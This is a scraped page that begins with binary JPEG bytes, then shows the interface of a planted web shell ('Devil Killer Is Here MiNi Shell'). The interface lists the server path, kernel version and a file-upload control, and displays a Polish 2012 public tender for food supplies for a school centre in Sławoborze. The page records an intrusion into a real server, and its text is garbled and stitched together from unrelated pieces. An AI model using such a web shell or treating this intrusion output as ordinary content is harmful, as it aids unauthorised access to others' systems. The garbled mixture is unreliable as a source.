JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121220/521356-N-2012.html

<p class="kh_header"><b>Świdwin: Dostawa artykułów żywnościowych w roku 2013</b><br>
<b>Numer ogłoszenia: 521356 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych w roku 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I świeże warzywa i owoce będzie obejmować
Banany kg 150, Buraki		
Miesiąc I-III	kg	80
Miesiąc IV-VI	kg	65
Miesiąc VII-IX	kg	40
Miesiąc X-XII	kg	75
Cebula 		
Miesiąc I-III	kg	45
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	15
Miesiąc X-XII	kg	50
Fasola Jaś gruba		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	20
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	15
Groch polówki	kg	50
Jabłka		
Miesiąc I-III	kg	170
Miesiąc IV-VI	kg	170
Miesiąc VII-IX	kg	70
Miesiąc X-XII	kg	200
Kapusta kiszona		
Miesiąc I-III	kg	90
Miesiąc IV-VI	kg	80
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	100
Kapusta czerwona	kg	20
Kapusta biała		
Miesiąc I-III	kg	50
Miesiąc IV-VI	kg	70
Miesiąc VII-IX	szt.	20
Miesiąc X-XII	szt.	50
Kalafior sezon 		
Miesiąc VIII-X	szt.	20
Koper świeży		
Miesiąc IV-VI	szt.	15
Miesiąc VII-IX	szt.	30
Miesiąc X-XII	szt.	15
Cytryna	kg	40
Kapusta pekińska		
Miesiąc I-III	kg	30
Miesiąc IV-VI	kg	25
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	30
Marchew		
Miesiąc I-III	kg	100
Miesiąc IV-VI	kg	45
Miesiąc VII-IX	kg	30
Miesiąc X-XII	kg	100
Mandarynki		
Miesiąc I-II	kg	30
Miesiąc III-V	kg	10
Miesiąc X-XII	kg	30
Ogórek kiszony		
Miesiąc I-III	kg	40
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	60
Ogórek świeży sezon		
Miesiąc IV-VII	kg	30
Miesiąc VIII-X	kg	20
Pomidory kl. I sezon		
Miesiąc V-X	kg	25
Pory		
Miesiąc I-III	kg	10
Miesiąc IV-VI	kg	10
Miesiąc VII-IX	kg	5
Miesiąc X-XII	kg	10
Pomarańcze 		
Miesiąc XII	kg	10
Pieczarki		
Miesiąc I-VII	kg	60
Miesiąc VII-XII	kg	40
Papryka czerwona kl. I 		
Miesiąc I - VI	kg	12
Miesiąc  IX-X	kg	10
Miesiąc XI-XII	kg	12
Pietruszka korzeń		
Miesiąc I-III	kg	8
Miesiąc IV-VI	       kg	4
Miesiąc VII-IX	kg	4
Miesiąc X-XII	kg	10
Rzodkiew biała	kg	80
Rzodkiewka		
Miesiąc IV-VI	szt.	30
Miesiąc IX-XI	szt.	10
Seler korzeń		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	5
Miesiąc VIII-IX	kg	12
Miesiąc X-XII	kg	30
Szczypior		
Miesiąc I-III	szt.	20
Miesiąc IV-VI	szt.	30
Miesiąc VII-IX	szt.	10
Miesiąc X-XII	      szt.	30
Sałata zielona  		
Miesiąc IV-VI	szt.	15
Miesiąc IX-X	szt.	10
Śliwy sezon 		
Miesiąc IX	kg	10
Truskawki sezon 		
V-VII	kg	10
Kiwi	szt.	200
Ziemniaki		
Miesiąc I-III	kg	1000
Miesiąc IV-VIII	kg	900
Miesiąc IX-XII	kg	1200
Część II wyroby piekarskie będzie obejmować
Chleb  zwykły
(krojony 0,60 kg)	szt.	1900
Bułka pszenna
(0,07kg)	szt.	2000
Chleb graham
(krojony 0,40kg)	szt.	 400
Chleb razowy
(krojony 0,40kg)	szt.	100
Drożdżówki ( 0,10kg)	szt.	100
Pączek ( 0,07kg)	szt.	120
Bułka tarta	kg	  30
Część III mrożone artykuły spożywcze będzie obejmować:
Brokuł  opak. 4 x 2,5kg = 10kg	kg	10
Bukiet warzyw (marchew, kalafior, brokuł) opak. 4 x 2,5kg = 10kg	kg	50
Fasolka szparagowa opak. 4 x 2,5kg = 10kg	kg	90
Kalafior opak. 4 x 2,5kg = 10kg	kg	50
Marchew karbowana opak. 4x 2,5kg = 10kg	kg	50
Mieszanka. kompotowa 4-składnikowa opak. 4 x 2,5kg = 10kg	kg	650
Mieszanka warzywna  9-składnikowa opak. 4 x 2,5kg = 10kg	kg	80
Mieszanka chińska	kg	50
Groszek zielony opak. 4 x 2,5kg = 10kg	kg	50
Filet rybny z dorsza bez skóry, bez glazury	kg	170
Włoszczyzna paski opak. 4 x 2,5kg = 10kg	kg	350
Pierogi z kapustą i grzybami	kg	30
Kluski śląskie	kg	80
Pyzy z mięsem	kg	80
Część IV jaja kurze świeże o gramaturze 70 -75g będzie obejmować:

Jaja kurze 70-75g	
szt.	
3300
Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery :
Cukier	kg	350
Mąka pszenna 1kg	kg	200
Kasza jęczmienna 1kg	kg	90
Kasza gryczana 1kg	kg	90
Kasza manna 1kg	kg	30
Ryż 1kg	kg	200
Makarony /różne kształty/	kg	180
Płatki kukurydziane	kg	30
Płatki śniadaniowe
 /różne smaki/	kg	25
Płatki owsiane	kg	20
Dżem wysokosłodzony  /różne smaki/ 270g	szt.	60
Marmolada wieloowocowa 500g	szt.	80
Powidła śliwkowe 500g	szt.	20
Groszek konserwowy 400 g	szt.	30
Keczup 500g	szt.	50
Koncentrat pomidorowy  30% 200g	szt.	110
Koncentrat pomidorowy 30%
850g	szt.	30
Syrop owocowy 430ml	szt.	30
Kukurydza 400g	szt.	40
Majonez 700ml	szt.	70
Majonez 260g	szt.	60
Ogórki konserwowe0,9l	szt.	35
Papryka konserwowa0,9l	szt.	50
Sałatka warzywna0,9l	szt.	50
Szczaw konserwowy0,9l	szt.	10
Fasola konserwowa 400g	szt.	20
Herbata ekspresowa 28g	szt.	200
Kakao 100 % - 200 g	szt.	40
Kawa Inka 150 g	szt.	60
Pasztet drobiowy 160g	szt.	150
Sałatka z makreli 300g	szt.	100
Mąka ziemniaczana	kg	30
Sól jodowana	kg	110
Olej uniwersalny 1l	szt	100
Frytura do smażenia	kg	40
 Margaryna  zwykła 250g	szt.	30
Sos sojowy 240g	szt.	15
Chrzan tarty 270g	szt.	50
Papryka mielona słodka, ostra 20g	szt.	140
Pieprz naturalny mielony 20g	szt.	100
Przyprawa do kurczaka 	kg	4
Przyprawa do ryb	kg	2
Przyprawa do mięsa wieprzowego	kg	4
Proszek do pieczenia 20 g	szt.	15
Ziele angielskie 20g	szt.	40
Kwasek cytrynowy 20g	szt.	50
Rosół drobiowy w kostce 120g	szt.	50
Musztarda 180g	szt	25
Cukier waniliowy 20g	szt	20
Cynamon 20g	szt.	15
 Galaretki owocowe 90g	szt.	20
Czosnek granulowany 20g	szt.	180
Liść laurowy 6g	szt.	30
Majeranek 150g	szt.	10
Kisiel bez cukru 40g	szt.	30
Ciastka różne	kg	10
Cukierki owocowe	kg	10
Cukierki czekoladowe	kg	6
Część VI  mięso świeże, wędliny i drób:
I Mięso świeże
Szynka wieprzowa b/k	kg	15
Karkówka wieprzowa b/k	kg	70
Schab wieprzowy b/k	kg	100
Łopatka wieprzowa b/k, b/s	kg	530
Wołowina extra	kg	60
Żeberka wieprzowe	kg	65
Biodrówka	kg	20
Wątroba wieprzowa	kg	30
II Wędliny świeże
Blok z indyka	kg	30
Baleron z indyka	kg	10
Kiełbasa piwna	kg	38
Kiełbasa śląska	kg	28
Kiełbasa szynkowa	kg	40
Kiełbasa krakowska parzona	kg	30
Kiełbasa żywiecka	kg	60
Mielonka drobiowa	kg	12
Parówki śląskie	kg	90
Pasztetowa	kg	30
Pieczeń rzymska	kg	40
Polędwica z warzywami	kg	60
Szynka wieprzowa prasowana	kg	30
Szynka wieprzowa	kg	35
Kaszanka	kg	40
Polędwica drobiowa	kg	22
Kiełbasa zwyczajna	kg	20
Pieczeń drobiowa	kg	10
Boczek parzony	kg	20
Kiełbasa biała	kg	10
Baton szynkowy drobiowy	kg	20
                         III Mięso drobiowe świeże
Kurczak	kg	80
Filet z kurczaka surowy	kg	160
Udka z kurczaka	kg	120
Wątróbka drobiowa	kg	10
Część VII  mleko i produkty mleczarskie:
Jogurt owocowy 120g	szt.	2100
Jogurt naturalny 370.	szt.	50
Jogurt owocowy 300g	szt.	150
Masło śmietankowe 82% kostka 200g	kg	200
Mleko 2% świeże	l.	1000
Mleko UHT 2%	l.	900
Serki topione miks krążek 140g	szt.	180
Serek topiony  kiełbaski  100 g	szt.	100
Ser żółty gouda/edamski	kg	100
Śmietana 18% 400g	szt.	580
Twaróg półtusty	kg	70
Serek waniliowy  w wiaderku	kg	90.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od obowiązku wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, minimum 2 dostawy, odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia. Przez dostawę odpowiadającą rodzajem rozumie się cykliczną dostawę żywności przez okres min. 12 miesięcy. Nie określa się minimalnej wartości zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno-Wychowawczy w Sławoborzu ul. Lepińska 3, 78-314 Sławoborze tel. 94 36 470 13, fax. 94 36 470 13..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:00, miejsce: Sekretariacie Specjalnego Ośrodka Szkolno-Wychowawczego w Sławoborzu, ul. Lepińska 3, 78-314 Sławoborze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg	150
Buraki		
Miesiąc I-III	kg	80
Miesiąc IV-VI	kg	65
Miesiąc VII-IX	kg	40
Miesiąc X-XII	kg	75
Cebula 		
Miesiąc I-III	kg	45
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	15
Miesiąc X-XII	kg	50
Fasola Jaś gruba		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	20
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	15
Groch polówki	kg	50
Jabłka		
Miesiąc I-III	kg	170
Miesiąc IV-VI	kg	170
Miesiąc VII-IX	kg	70
Miesiąc X-XII	kg	200
Kapusta kiszona		
Miesiąc I-III	kg	90
Miesiąc IV-VI	kg	80
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	100
Kapusta czerwona	kg	20
Kapusta biała		
Miesiąc I-III	kg	50
Miesiąc IV-VI	kg	70
Miesiąc VII-IX	szt.	20
Miesiąc X-XII	szt.	50
Kalafior sezon 		
Miesiąc VIII-X	szt.	20
Koper świeży		
Miesiąc IV-VI	szt.	15
Miesiąc VII-IX	szt.	30
Miesiąc X-XII	szt.	15
Cytryna	kg	40
Kapusta pekińska		
Miesiąc I-III	kg	30
Miesiąc IV-VI	kg	25
Miesiąc VII-IX	kg	10
Miesiąc X-XII	kg	30
Marchew		
Miesiąc I-III	kg	100
Miesiąc IV-VI	kg	45
Miesiąc VII-IX	kg	30
Miesiąc X-XII	kg	100
Mandarynki		
Miesiąc I-II	kg	30
Miesiąc III-V	kg	10
Miesiąc X-XII	kg	30
Ogórek kiszony		
Miesiąc I-III	kg	40
Miesiąc IV-VI	kg	40
Miesiąc VII-IX	kg	20
Miesiąc X-XII	kg	60
Ogórek świeży sezon		
Miesiąc IV-VII	kg	30
Miesiąc VIII-X	kg	20
Pomidory kl. I sezon		
Miesiąc V-X	kg	25
Pory		
Miesiąc I-III	kg	10
Miesiąc IV-VI	kg	10
Miesiąc VII-IX	kg	5
Miesiąc X-XII	kg	10
Pomarańcze 		
Miesiąc XII	kg	10
Pieczarki		
Miesiąc I-VII	kg	60
Miesiąc VII-XII	kg	40
Papryka czerwona kl. I 		
Miesiąc I - VI	kg	12
Miesiąc  IX-X	kg	10
Miesiąc XI-XII	kg	12
Pietruszka korzeń		
Miesiąc I-III	kg	8
Miesiąc IV-VI	       kg	4
Miesiąc VII-IX	kg	4
Miesiąc X-XII	kg	10
Rzodkiew biała	kg	80
Rzodkiewka		
Miesiąc IV-VI	szt.	30
Miesiąc IX-XI	szt.	10
Seler korzeń		
Miesiąc I-III	kg	20
Miesiąc IV-VI	kg	5
Miesiąc VIII-IX	kg	12
Miesiąc X-XII	kg	30
Szczypior		
Miesiąc I-III	szt.	20
Miesiąc IV-VI	szt.	30
Miesiąc VII-IX	szt.	10
Miesiąc X-XII	      szt.	30
Sałata zielona  		
Miesiąc IV-VI	szt.	15
Miesiąc IX-X	szt.	10
Śliwy sezon 		
Miesiąc IX	kg	10
Truskawki sezon 		
V-VII	kg	10
Kiwi	szt.	200
Ziemniaki		
Miesiąc I-III	kg	1000
Miesiąc IV-VIII	kg	900
Miesiąc IX-XII	kg	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  zwykły
(krojony 0,60 kg)	szt.	1900
Bułka pszenna
(0,07kg)	szt.	2000
Chleb graham
(krojony 0,40kg)	szt.	 400
Chleb razowy
(krojony 0,40kg)	szt.	100
Drożdżówki ( 0,10kg)	szt.	100
Pączek ( 0,07kg)	szt.	120
Bułka tarta	kg	  30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł  opak. 4 x 2,5kg = 10kg	kg	10
Bukiet warzyw (marchew, kalafior, brokuł) opak. 4 x 2,5kg = 10kg	kg	50
Fasolka szparagowa opak. 4 x 2,5kg = 10kg	kg	90
Kalafior opak. 4 x 2,5kg = 10kg	kg	50
Marchew karbowana opak. 4x 2,5kg = 10kg	kg	50
Mieszanka. kompotowa 4-składnikowa opak. 4 x 2,5kg = 10kg	kg	650
Mieszanka warzywna  9-składnikowa opak. 4 x 2,5kg = 10kg	kg	80
Mieszanka chińska	kg	50
Groszek zielony opak. 4 x 2,5kg = 10kg	kg	50
Filet rybny z dorsza bez skóry, bez glazury	kg	170
Włoszczyzna paski opak. 4 x 2,5kg = 10kg	kg	350
Pierogi z kapustą i grzybami	kg	30
Kluski śląskie	kg	80
Pyzy z mięsem	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze świeże o gramaturze 70 -75g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze 70-75g	
szt.	
3300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
